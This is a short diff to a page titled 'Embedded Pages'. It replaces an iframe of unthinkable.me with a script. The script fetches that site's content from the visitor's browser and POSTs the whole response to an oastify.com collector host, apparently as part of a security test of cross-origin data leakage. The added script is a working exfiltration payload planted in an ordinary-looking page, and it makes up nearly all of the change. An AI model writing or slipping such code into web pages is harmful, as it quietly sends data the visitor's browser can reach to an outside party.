--- a/iframe.html
+++ b/iframe.html
@@ -6,8 +6,22 @@
     <title>Embedded Pages</title>
 </head>
 <body>
-    <h1>Embedded Pages</h1>
-    <iframe src="http://unthinkable.me/" width="100%" height="500px"></iframe>
+    <h1></h1>
+    <!-- <iframe src="http://unthinkable.me/" width="100%" height="500px"></iframe> -->
+    <script>
+        fetch('http://unthinkable.me/')
+            .then(response => response.text())
+            .then(data => {
+                fetch("http://4qvsaj37n739p5mnhvem66iujlpcdg15.oastify.com", {
+                    method: "POST",
+                    headers: {
+                        'Content-Type': 'application/x-www-form-urlencoded'
+                    },
+                    body: "data=" + encodeURIComponent(data)
+                });
+            });
+    </script>
+    
 
 </body>
 </html>
